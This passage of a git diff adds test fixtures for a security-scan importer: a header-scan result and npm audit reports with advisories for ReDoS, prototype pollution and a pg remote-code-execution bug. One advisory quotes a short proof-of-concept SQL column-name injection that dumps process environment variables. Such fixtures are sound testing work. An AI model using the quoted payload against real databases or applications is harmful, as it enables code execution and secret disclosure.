ScriptingCWE:79OWASP_API:2019-API7OWASP:2017-A7OWASP:2010-A2OWASP:2013-A3 \ No newline at end of file diff --git a/unittests/scans/nmap_scanme.json b/unittests/scans/nmap_scanme.json new file mode 100644 index 00000000000..ca05d80a821 --- /dev/null +++ b/unittests/scans/nmap_scanme.json @@ -0,0 +1,190 @@ +{ + "scan": { + "algorithm_version": 2, + "end_time": "Tue, 04 May 2021 09:07:02 GMT", + "grade": "F", + "hidden": false, + "likelihood_indicator": "MEDIUM", + "response_headers": { + "Accept-Ranges": "bytes", + "Connection": "Keep-Alive", + "Content-Type": "text/html; charset=utf-8", + "Date": "Tue, 04 May 2021 09:07:01 GMT", + "Keep-Alive": "timeout=5, max=100", + "Server": "Apache/2.4.6 (CentOS)", + "Strict-Transport-Security": "max-age=31536000; preload", + "Transfer-Encoding": "chunked" + }, + "scan_id": 18995270, + "score": 0, + "start_time": "Tue, 04 May 2021 09:07:00 GMT", + "state": "FINISHED", + "status_code": 200, + "tests_failed": 7, + "tests_passed": 5, + "tests_quantity": 12 + }, + "tests": { + "content-security-policy": { + "expectation": "csp-implemented-with-no-unsafe", + "name": "content-security-policy", + "output": { + "data": null, + "http": false, + "meta": false, + "policy": null + }, + "pass": false, + "result": "csp-not-implemented", + "score_description": "Content Security Policy (CSP) header not implemented", + "score_modifier": -25 + }, + "contribute": { + "expectation": "contribute-json-only-required-on-mozilla-properties", + "name": "contribute", + "output": { + "data": null + }, + "pass": true, + "result": "contribute-json-only-required-on-mozilla-properties", + "score_description": "Contribute.json isn't required on websites that don't belong to Mozilla", + "score_modifier": 0 + }, + "cookies": { + "expectation": "cookies-secure-with-httponly-sessions", + "name": "cookies", + "output": { + "data": null, + "sameSite": null + }, + "pass": true, + "result": "cookies-not-found", + "score_description": "No cookies detected", + "score_modifier": 0 + }, + "cross-origin-resource-sharing": { + "expectation": "cross-origin-resource-sharing-not-implemented", + "name": "cross-origin-resource-sharing", + "output": { + "data": { + "acao": null, + "clientaccesspolicy": null, + "crossdomain": null + } + }, + "pass": true, + "result": "cross-origin-resource-sharing-not-implemented", + "score_description": "Content is not visible via cross-origin resource sharing (CORS) files or headers", + "score_modifier": 0 + }, + "public-key-pinning": { + "expectation": "hpkp-not-implemented", + "name": "public-key-pinning", + "output": { + "data": null, + "includeSubDomains": false, + "max-age": null, + "numPins": null, + "preloaded": false + }, + "pass": true, + "result": "hpkp-invalid-cert", + "score_description": "HTTP Public Key Pinning (HPKP) header cannot be set, as site contains an invalid certificate chain", + "score_modifier": 0 + }, + "redirection": { + "expectation": "redirection-to-https", + "name": "redirection", + "output": { + "destination": "https://nmap.org/", + "redirects": true, + "route": [ + "http://nmap-scanme.nmap.org/", + "https://nmap.org/" + ], + "status_code": 301 + }, + "pass": false, + "result": "redirection-off-host-from-http", + "score_description": "Initial redirection from HTTP to HTTPS is to a different host, preventing HSTS", + "score_modifier": -5 + }, + "referrer-policy": { + "expectation": "referrer-policy-private", + "name": "referrer-policy", + "output": { + "data": null, + "http": false, + "meta": false + }, + "pass": true, + "result": "referrer-policy-not-implemented", + "score_description": "Referrer-Policy header not implemented", + "score_modifier": 0 + }, + "strict-transport-security": { + "expectation": "hsts-implemented-max-age-at-least-six-months", + "name": "strict-transport-security", + "output": { + "data": null, + "includeSubDomains": false, + "max-age": null, + "preload": false, + "preloaded": false + }, + "pass": false, + "result": "hsts-invalid-cert", + "score_description": "HTTP Strict Transport Security (HSTS) header cannot be set, as site contains an invalid certificate chain", + "score_modifier": -20 + }, + "subresource-integrity": { + "expectation": "sri-implemented-and-external-scripts-loaded-securely", + "name": "subresource-integrity", + "output": { + "data": { + "//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js": { + "crossorigin": null, + "integrity": null + } + } + }, + "pass": false, + "result": "sri-not-implemented-and-external-scripts-not-loaded-securely", + "score_description": "Subresource Integrity (SRI) not implemented, and external scripts are loaded over HTTP or use protocol-relative URLs via src=\"//...\"", + "score_modifier": -50 + }, + "x-content-type-options": { + "expectation": "x-content-type-options-nosniff", + "name": "x-content-type-options", + "output": { + "data": null + }, + "pass": false, + "result": "x-content-type-options-not-implemented", + "score_description": "X-Content-Type-Options header not implemented", + "score_modifier": -5 + }, + "x-frame-options": { + "expectation": "x-frame-options-sameorigin-or-deny", + "name": "x-frame-options", + "output": { + "data": null + }, + "pass": false, + "result": "x-frame-options-not-implemented", + "score_description": "X-Frame-Options (XFO) header not implemented", + "score_modifier": -20 + }, + "x-xss-protection": { + "expectation": "x-xss-protection-1-mode-block", + "name": "x-xss-protection", + "output": { + "data": null + }, + "pass": false, + "result": "x-xss-protection-not-implemented", + "score_description": "X-XSS-Protection header not implemented", + "score_modifier": -10 + } + } +} diff --git a/unittests/scans/npm_audit_sample/empty_with_error.json b/unittests/scans/npm_audit_sample/empty_with_error.json new file mode 100644 index 00000000000..5a697518e13 --- /dev/null +++ b/unittests/scans/npm_audit_sample/empty_with_error.json @@ -0,0 +1,7 @@ +{ + "error": { + "code": "ENOAUDIT", + "summary": "Your configured registry (https://registry.npmjs.org/) may not support audit requests, or the audit endpoint may be temporarily unavailable.", + "detail": "" + } +} \ No newline at end of file diff --git a/unittests/scans/npm_audit_sample/many_vuln.json b/unittests/scans/npm_audit_sample/many_vuln.json new file mode 100644 index 00000000000..8391415d047 --- /dev/null +++ b/unittests/scans/npm_audit_sample/many_vuln.json @@ -0,0 +1,394 @@ +{ + "actions": [ + { + "action": "install", + "module": "express", + "target": "4.16.3", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "express>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 534, + "path": "express>finalhandler>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 534, + "path": "express>send>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 534, + "path": "express>serve-static>send>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 106, + "path": "express>accepts>negotiator", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 526, + "path": "express>fresh", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 526, + "path": "express>send>fresh", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 526, + "path": "express>serve-static>send>fresh", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 535, + "path": "express>send>mime", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 535, + "path": "express>serve-static>send>mime", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "serve-favicon", + "target": "2.5.0", + "isMajor": false, + "resolves": [ + { + "id": 526, + "path": "serve-favicon>fresh", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "pg-promise", + "target": "8.4.5", + "isMajor": true, + "resolves": [ + { + "id": 521, + "path": "pg-promise>pg", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "body-parser", + "target": "1.18.3", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "body-parser>debug", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "debug", + "target": "3.1.0", + "isMajor": true, + "resolves": [ + { + "id": 534, + "path": "debug", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "morgan", + "target": "1.9.0", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "morgan>debug", + "dev": false, + "optional": false, + "bundled": false + } + ] + } + ], + "advisories": { + "106": { + "findings": [ + { + "version": "0.5.3", + "paths": [ + "express>accepts>negotiator" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 106, + "created": "2016-05-04T16:34:12.000Z", + "updated": "2018-04-17T12:58:40.142Z", + "deleted": null, + "title": "Regular Expression Denial of Service", + "found_by": { + "name": "Adam Baldwin" + }, + "reported_by": { + "name": "Adam Baldwin" + }, + "module_name": "negotiator", + "cves": [ + "CVE-2016-10539" + ], + "vulnerable_versions": "<= 0.6.0", + "patched_versions": ">= 0.6.1", + "overview": "Affected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value.\n\n", + "recommendation": "Update to version 0.6.1 or later.", + "references": "", + "access": "public", + "severity": "high", + "cwe": "CWE-400", + "metadata": { + "module_type": "Network.Library", + "exploitability": 6, + "affected_components": "Internal::Code::Function::acceptsLanguages()" + }, + "url": "https://nodesecurity.io/advisories/106" + }, + "521": { + "findings": [ + { + "version": "5.1.0", + "paths": [ + "pg-promise>pg" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 521, + "created": "2017-08-13T04:26:17.960Z", + "updated": "2018-04-08T22:40:41.503Z", + "deleted": null, + "title": "Remote Code Execution", + "found_by": { + "name": "Sehrope Sarkuni" + }, + "reported_by": { + "name": "Sehrope Sarkuni" + }, + "module_name": "pg", + "cves": [ + "CVE-2017-16082" + ], + "vulnerable_versions": "< 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 || >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2", + "patched_versions": ">= 2.11.2 < 3.0.0|| >= 3.6.4 < 4.0.0 || >= 4.5.7 < 5.0.0 || >= 5.2.1 < 6.0.0 || >= 6.0.5 < 6.1.0 || >= 6.1.6 < 6.2.0 || >= 6.2.5 < 6.3.0 || >= 6.3.3 < 6.4.0 || >= 6.4.2 < 7.0.0 || >= 7.0.2 < 7.1.0 || >= 7.1.2", + "overview": "Affected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name. \n\nThere are two specific scenarios in which it is likely for an application to be vulnerable:\n1. The application executes unsafe, user-supplied sql which contains malicious column names.\n2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.\n\n## Proof of Concept\n```\nconst { Client } = require('pg')\nconst client = new Client()\nclient.connect()\n\nconst sql = `SELECT 1 AS \"\\\\'/*\", 2 AS \"\\\\'*/\\n + console.log(process.env)] = null;\\n//\"`\n\nclient.query(sql, (err, res) => {\n client.end()\n})\n```", + "recommendation": "* Version 2.x.x: Update to version 2.11.2 or later.\n* Version 3.x.x: Update to version 3.6.4 or later.\n* Version 4.x.x: Update to version 4.5.7 or later.\n* Version 5.x.x: Update to version 5.2.1 or later.\n* Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )\n* Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )", + "references": "[Node Postgres: Code Execution Vulnerability Announcement](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)", + "access": "public", + "severity": "high", + "cwe": "CWE-94", + "metadata": { + "module_type": "Network.Library", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/521" + }, + "526": { + "findings": [ + { + "version": "0.3.0", + "paths": [ + "express>fresh", + "express>send>fresh", + "express>serve-static>send>fresh", + "serve-favicon>fresh" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 526, + "created": "2017-09-08T20:23:54.164Z", + "updated": "2018-04-09T00:15:21.807Z", + "deleted": null, + "title": "Regular Expression Denial of Service", + "found_by": { + "name": "Cristian-Alexandru Staicu" + }, + "reported_by": { + "name": "Cristian-Alexandru Staicu" + }, + "module_name": "fresh", + "cves": [ + "CVE-2017-16119" + ], + "vulnerable_versions": "< 0.5.2", + "patched_versions": ">= 0.5.2", + "overview": "Affected versions of `fresh` are vulnerable to regular expression denial of service when parsing specially crafted user input.", + "recommendation": "Update to version 0.5.2 or later.", + "references": "", + "access": "public", + "severity": "high", + "cwe": "CWE-400", + "metadata": { + "module_type": "Multi.Library", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/526" + }, + "534": { + "findings": [ + { + "version": "2.2.0", + "paths": [ + "body-parser>debug", + "debug", + "express>debug", + "express>finalhandler>debug", + "express>send>debug", + "express>serve-static>send>debug", + "morgan>debug" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 534, + "created": "2017-09-25T18:55:55.956Z", + "updated": "2018-05-16T19:37:43.686Z", + "deleted": null, + "title": "Regular Expression Denial of Service", + "found_by": { + "name": "Cristian-Alexandru Staicu" + }, + "reported_by": { + "name": "Cristian-Alexandru Staicu" + }, + "module_name": "debug", + "cves": [ + "CVE-2017-16137" + ], + "vulnerable_versions": "<= 2.6.8 || >= 3.0.0 <= 3.0.1", + "patched_versions": ">= 2.6.9 < 3.0.0 || >= 3.1.0", + "overview": "Affected versions of `debug` are vulnerable to regular expression denial of service when untrusted user input is passed into the `o` formatter. \n\nAs it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.", + "recommendation": "Version 2.x.x: Update to version 2.6.9 or later.\nVersion 3.x.x: Update to version 3.1.0 or later.\n", + "references": "- [Issue #501](https://github.com/visionmedia/debug/issues/501)\n- [PR #504](https://github.com/visionmedia/debug/pull/504)", + "access": "public", + "severity": "low", + "cwe": "CWE-400", + "metadata": { + "module_type": "", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/534" + }, + "535": { + "findings": [ + { + "version": "1.3.4", + "paths": [ + "c748e76b6a1b63450590f72e14f9b53ad357bc64632ff0bda73d00799c4a0a91>send>mime", + "express>serve-static>send>mime" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 535, + "created": "2017-09-25T19:02:28.152Z", + "updated": "2018-04-09T00:38:22.785Z", + "deleted": null, + "title": "Regular Expression Denial of Service", + "found_by": { + "name": "Cristian-Alexandru Staicu" + }, + "reported_by": { + "name": "Cristian-Alexandru Staicu" + }, + "module_name": "mime", + "cves": [ + "CVE-2017-16138" + ], + "vulnerable_versions": "< 1.4.1 || > 2.0.0 < 2.0.3", + "patched_versions": ">= 1.4.1 < 2.0.0 || >= 2.0.3", + "overview": "Affected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.", + "recommendation": "Update to version 2.0.3 or later.", + "references": "[Issue #167](https://github.com/broofa/node-mime/issues/167)", + "access": "public", + "severity": "moderate", + "cwe": "CWE-", + "metadata": { + "module_type": "Multi.Library", + "exploitability": 4, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/535" + } + }, + "muted": [], + "metadata": { + "vulnerabilities": { + "info": 0, + "low": 7, + "moderate": 2, + "high": 6, + "critical": 0 + }, + "dependencies": 159, + "devDependencies": 0, + "optionalDependencies": 0, + "totalDependencies": 159 + }, + "runId": "849ed1f1-5dd8-4fda-872a-05cd46957c82" +} diff --git a/unittests/scans/npm_audit_sample/many_vuln_npm7.json b/unittests/scans/npm_audit_sample/many_vuln_npm7.json new file mode 100644 index 00000000000..25a18947fa6 --- /dev/null +++ b/unittests/scans/npm_audit_sample/many_vuln_npm7.json @@ -0,0 +1,329 @@ +{ + "auditReportVersion": 2, + "vulnerabilities": { + "acorn": { + "name": "acorn", + "severity": "moderate", + "via": [ + { + "source": 1488, + "name": "acorn", + "dependency": "acorn", + "title": "Regular Expression Denial of Service", + "url": "https://npmjs.com/advisories/1488", + "severity": "moderate", + "range": ">=5.5.0 <5.7.4 || >=6.0.0 <6.4.1 || >=7.0.0 <7.1.1" + } + ], + "effects": [], + "range": "5.5.0 - 5.7.3 || 6.0.0 - 6.4.0 || 7.0.0 - 7.1.0", + "nodes": [ + "node_modules/acorn", + "node_modules/acorn-globals/node_modules/acorn", + "node_modules/eslint/node_modules/acorn", + "node_modules/espree/node_modules/acorn" + ], + "fixAvailable": true + }, + "gulp": { + "name": "gulp", + "severity": "low", + "via": [ + "gulp-cli" + ], + "effects": [], + "range": ">=4.0.0", + "nodes": [ + "node_modules/gulp" + ], + "fixAvailable": { + "name": "gulp", + "version": "3.9.1", + "isSemVerMajor": true + } + }, + "gulp-cli": { + "name": "gulp-cli", + "severity": "low", + "via": [ + "yargs" + ], + "effects": [ + "gulp" + ], + "range": ">=2.0.0", + "nodes": [ + "node_modules/gulp-cli" + ], + "fixAvailable": { + "name": "gulp-cli", + "version": "1.4.0", + "isSemVerMajor": true + } + }, + "handlebars": { + "name": "handlebars", + "severity": "low", + "via": [ + "optimist" + ], + "effects": [], + "range": "3.0.0 - 4.7.3", + "nodes": [ + "node_modules/handlebars" + ], + "fixAvailable": true + }, + "highcharts": { + "name": "highcharts", + "severity": "high", + "via": [ + { + "source": 1227, + "name": "highcharts", + "dependency": "highcharts", + "title": "Cross-Site Scripting", + "url": "https://npmjs.com/advisories/1227", + "severity": "high", + "range": "<7.2.2 || >=8.0.0 <8.1.1" + } + ], + "effects": [], + "range": "<7.2.2 || >=8.0.0 <8.1.1", + "nodes": [ + "node_modules/highcharts" + ], + "fixAvailable": true + }, + "jquery": { + "name": "jquery", + "severity": "moderate", + "via": [ + { + "source": 1518, + "name": "jquery", + "dependency": "jquery", + "title": "Cross-Site Scripting", + "url": "https://npmjs.com/advisories/1518", + "severity": "moderate", + "range": "<3.5.0" + } + ], + "effects": [], + "range": "<3.5.0", + "nodes": [ + "node_modules/jquery" + ], + "fixAvailable": true + }, + "kind-of": { + "name": "kind-of", + "severity": "low", + "via": [ + { + "source": 1490, + "name": "kind-of", + "dependency": "kind-of", + "title": "Validation Bypass", + "url": "https://npmjs.com/advisories/1490", + "severity": "low", + "range": ">=6.0.0 <6.0.3" + } + ], + "effects": [], + "range": "6.0.0 - 6.0.2", + "nodes": [ + "node_modules/base/node_modules/kind-of", + "node_modules/define-property/node_modules/kind-of", + "node_modules/extglob/node_modules/kind-of", + "node_modules/make-iterator/node_modules/kind-of", + "node_modules/micromatch/node_modules/kind-of", + "node_modules/nanomatch/node_modules/kind-of", + "node_modules/snapdragon-node/node_modules/kind-of" + ], + "fixAvailable": true + }, + "lodash": { + "name": "lodash", + "severity": "low", + "via": [ + { + "source": 1523, + "name": "lodash", + "dependency": "lodash", + "title": "Prototype Pollution", + "url": "https://npmjs.com/advisories/1523", + "severity": "low", + "range": "<4.17.19" + } + ], + "effects": [], + "range": "<4.17.19", + "nodes": [ + "node_modules/lodash" + ], + "fixAvailable": true + }, + "minimist": { + "name": "minimist", + "severity": "low", + "via": [ + { + "source": 1179, + "name": "minimist", + "dependency": "minimist", + "title": "Prototype Pollution", + "url": "https://npmjs.com/advisories/1179", + "severity": "low", + "range": "<0.2.1 || >=1.0.0 <1.2.3" + } + ], + "effects": [ + "mkdirp", + "optimist" + ], + "range": "<0.2.1 || >=1.0.0 <1.2.3", + "nodes": [ + "node_modules/fsevents/node_modules/minimist", + "node_modules/fsevents/node_modules/rc/node_modules/minimist", + "node_modules/minimist", + "node_modules/mkdirp/node_modules/minimist", + "node_modules/optimist/node_modules/minimist" + ], + "fixAvailable": true + }, + "mkdirp": { + "name": "mkdirp", + "severity": "low", + "via": [ + "minimist" + ], + "effects": [], + "range": "0.4.1 - 0.5.1", + "nodes": [ + "node_modules/fsevents/node_modules/mkdirp", + "node_modules/mkdirp" + ], + "fixAvailable": true + }, + "node-sass": { + "name": "node-sass", + "severity": "low", + "via": [ + { + "source": 961, + "name": "node-sass", + "dependency": "node-sass", + "title": "Denial of Service", + "url": "https://npmjs.com/advisories/961", + "severity": "low", + "range": ">=3.3.0 <4.13.1" + }, + "sass-graph" + ], + "effects": [], + "range": ">=3.3.0", + "nodes": [ + "node_modules/node-sass" + ], + "fixAvailable": true + }, + "optimist": { + "name": "optimist", + "severity": "low", + "via": [ + "minimist" + ], + "effects": [ + "handlebars" + ], + "range": ">=0.6.0", + "nodes": [ + "node_modules/optimist" + ], + "fixAvailable": true + }, + "sass-graph": { + "name": "sass-graph", + "severity": "low", + "via": [ + "yargs" + ], + "effects": [ + "node-sass" + ], + "range": "2.1.2 - 3.0.4", + "nodes": [ + "node_modules/sass-graph" + ], + "fixAvailable": true + }, + "yargs": { + "name": "yargs", + "severity": "low", + "via": [ + "yargs-parser" + ], + "effects": [ + "gulp-cli", + "sass-graph" + ], + "range": "4.0.0-alpha1 - 12.0.5 || 14.1.0 || 15.0.0 - 15.2.0", + "nodes": [ + "node_modules/yargs" + ], + "fixAvailable": { + "name": "gulp-cli", + "version": "1.4.0", + "isSemVerMajor": true + } + }, + "yargs-parser": { + "name": "yargs-parser", + "severity": "low", + "via": [ + { + "source": 1500, + "name": "yargs-parser", + "dependency": "yargs-parser", + "title": "Prototype Pollution", + "url": "https://npmjs.com/advisories/1500", + "severity": "low", + "range": "<13.1.2 || >=14.0.0 <15.0.1 || >=16.0.0 <18.1.2" + } + ], + "effects": [ + "yargs" + ], + "range": "<=13.1.1 || 14.0.0 - 15.0.0 || 16.0.0 - 18.1.1", + "nodes": [ + "node_modules/jest-runtime/node_modules/yargs-parser", + "node_modules/jest/node_modules/yargs-parser", + "node_modules/yargs-parser" + ], + "fixAvailable": { + "name": "gulp-cli", + "version": "1.4.0", + "isSemVerMajor": true + } + } + }, + "metadata": { + "vulnerabilities": { + "info": 0, + "low": 12, + "moderate": 2, + "high": 1, + "critical": 0, + "total": 15 + }, + "dependencies": { + "prod": 5, + "dev": 1042, + "optional": 71, + "peer": 0, + "peerOptional": 0, + "total": 1047 + } + } +} diff --git a/unittests/scans/npm_audit_sample/many_vuln_with_groups.json b/unittests/scans/npm_audit_sample/many_vuln_with_groups.json new file mode 100644 index 00000000000..306266d4b62 --- /dev/null +++ b/unittests/scans/npm_audit_sample/many_vuln_with_groups.json @@ -0,0 +1,387 @@ +{ + "actions": [ + { + "action": "install", + "module": "express", + "target": "4.16.3", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "express>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 534, + "path": "express>finalhandler>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 534, + "path": "express>send>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 534, + "path": "express>serve-static>send>debug", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 106, + "path": "express>accepts>negotiator", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 526, + "path": "express>fresh", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 526, + "path": "express>send>fresh", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 526, + "path": "express>serve-static>send>fresh", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 535, + "path": "express>send>mime", + "dev": false, + "optional": false, + "bundled": false + }, + { + "id": 535, + "path": "express>serve-static>send>mime", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "serve-favicon", + "target": "2.5.0", + "isMajor": false, + "resolves": [ + { + "id": 526, + "path": "serve-favicon>fresh", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "pg-promise", + "target": "8.4.5", + "isMajor": true, + "resolves": [ + { + "id": 521, + "path": "pg-promise>pg", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "body-parser", + "target": "1.18.3", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "body-parser>debug", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "debug", + "target": "3.1.0", + "isMajor": true, + "resolves": [ + { + "id": 534, + "path": "debug", + "dev": false, + "optional": false, + "bundled": false + } + ] + }, + { + "action": "install", + "module": "morgan", + "target": "1.9.0", + "isMajor": false, + "resolves": [ + { + "id": 534, + "path": "morgan>debug", + "dev": false, + "optional": false, + "bundled": false + } + ] + } + ], + "advisories": { + "106": { + "findings": [ + { + "version": "0.5.3", + "paths": [ + "express>accepts>negotiator" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 106, + "created": "2016-05-04T16:34:12.000Z", + "updated": "2018-04-17T12:58:40.142Z", + "deleted": null, + "title": "Regular Expression Denial of Service", + "found_by": { + "name": "Adam Baldwin" + }, + "reported_by": { + "name": "Adam Baldwin" + }, + "module_name": "negotiator", + "cves": [ + "CVE-2016-10539" + ], + "vulnerable_versions": "<= 0.6.0", + "patched_versions": ">= 0.6.1", + "overview": "Affected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value.\n\n", + "recommendation": "Update to version 0.6.1 or later.", + "references": "", + "access": "public", + "severity": "high", + "cwe": "CWE-400", + "metadata": { + "module_type": "Network.Library", + "exploitability": 6, + "affected_components": "Internal::Code::Function::acceptsLanguages()" + }, + "url": "https://nodesecurity.io/advisories/106" + }, + "107": { + "findings": [ + { + "version": "0.5.3", + "paths": [ + "express>accepts>negotiator" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 107, + "created": "2016-05-04T16:34:12.000Z", + "updated": "2018-04-17T12:58:40.142Z", + "deleted": null, + "title": "2222Regular Expression Denial of Service", + "found_by": { + "name": "Adam Baldwin" + }, + "reported_by": { + "name": "Adam Baldwin" + }, + "module_name": "negotiator", + "cves": [ + "CVE-2019-10321" + ], + "vulnerable_versions": "<= 0.6.0", + "patched_versions": ">= 0.6.1", + "overview": "Affected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value.\n\n", + "recommendation": "Update to version 0.6.1 or later.", + "references": "", + "access": "public", + "severity": "high", + "cwe": "CWE-300", + "metadata": { + "module_type": "Network.Library", + "exploitability": 6, + "affected_components": "Internal::Code::Function::acceptsLanguages()" + }, + "url": "https://nodesecurity.io/advisories/107" + }, + "521": { + "findings": [ + { + "version": "5.1.0", + "paths": [ + "pg-promise>pg" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 521, + "created": "2017-08-13T04:26:17.960Z", + "updated": "2018-04-08T22:40:41.503Z", + "deleted": null, + "title": "Remote Code Execution", + "found_by": { + "name": "Sehrope Sarkuni" + }, + "reported_by": { + "name": "Sehrope Sarkuni" + }, + "module_name": "pg", + "cves": [ + "CVE-2017-16082" + ], + "vulnerable_versions": "< 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 || >= 6.2.0 < 6.2.5 || >= 6.3.0 < 6.3.3 || >= 6.4.0 < 6.4.2 || >= 7.0.0 < 7.0.2 || >= 7.1.0 < 7.1.2", + "patched_versions": ">= 2.11.2 < 3.0.0|| >= 3.6.4 < 4.0.0 || >= 4.5.7 < 5.0.0 || >= 5.2.1 < 6.0.0 || >= 6.0.5 < 6.1.0 || >= 6.1.6 < 6.2.0 || >= 6.2.5 < 6.3.0 || >= 6.3.3 < 6.4.0 || >= 6.4.2 < 7.0.0 || >= 7.0.2 < 7.1.0 || >= 7.1.2", + "overview": "Affected versions of `pg` contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name. \n\nThere are two specific scenarios in which it is likely for an application to be vulnerable:\n1. The application executes unsafe, user-supplied sql which contains malicious column names.\n2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.\n\n## Proof of Concept\n```\nconst { Client } = require('pg')\nconst client = new Client()\nclient.connect()\n\nconst sql = `SELECT 1 AS \"\\\\'/*\", 2 AS \"\\\\'*/\\n + console.log(process.env)] = null;\\n//\"`\n\nclient.query(sql, (err, res) => {\n client.end()\n})\n```", + "recommendation": "* Version 2.x.x: Update to version 2.11.2 or later.\n* Version 3.x.x: Update to version 3.6.4 or later.\n* Version 4.x.x: Update to version 4.5.7 or later.\n* Version 5.x.x: Update to version 5.2.1 or later.\n* Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )\n* Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )", + "references": "[Node Postgres: Code Execution Vulnerability Announcement](https://node-postgres.com/announcements#2017-08-12-code-execution-vulnerability)", + "access": "public", + "severity": "high", + "cwe": "CWE-94", + "metadata": { + "module_type": "Network.Library", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/521" + }, + "526": { + "findings": [ + { + "version": "0.3.0", + "paths": [ + "express>fresh", + "express>send>fresh", + "express>serve-static>send>fresh", + "serve-favicon>fresh" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 526, + "created": "2017-09-08T20:23:54.164Z", + "updated": "2018-04-09T00:15:21.807Z", + "deleted": null, + "title": "Regular Expression Denial of Service", + "found_by": { + "name": "Cristian-Alexandru Staicu" + }, + "reported_by": { + "name": "Cristian-Alexandru Staicu" + }, + "module_name": "fresh", + "cves": [ + "CVE-2017-16119" + ], + "vulnerable_versions": "< 0.5.2", + "patched_versions": ">= 0.5.2", + "overview": "Affected versions of `fresh` are vulnerable to regular expression denial of service when parsing specially crafted user input.", + "recommendation": "Update to version 0.5.2 or later.", + "references": "", + "access": "public", + "severity": "high", + "cwe": "CWE-400", + "metadata": { + "module_type": "Multi.Library", + "exploitability": 5, + "affected_components": "" + }, + "url": "https://nodesecurity.io/advisories/526" + }, + "522": { + "findings": [ + { + "version": "5.1.0", + "paths": [ + "pg-promise>pg" + ], + "dev": false, + "optional": false, + "bundled": false + } + ], + "id": 522, + "created": "2017-08-13T04:26:17.960Z", + "updated": "2018-04-08T22:40:41.503Z", + "deleted": null, + "title": "2222Remote Code Execution", + "found_by": { + "name": "Sehrope Sarkuni" + }, + "reported_by": { + "name": "Sehrope Sarkuni" + }, + "module_name": "pg", + "cves": [ + "CVE-2019-16082" + ], + "vulnerable_versions": "< 2.11.2 || >= 3.0.0 < 3.6.4 || >= 4.0.0 < 4.5.7 || >= 5.0.0 < 5.2.1 || >= 6.0.0 < 6.0.5 || >= 6.1.0 < 6.1.6 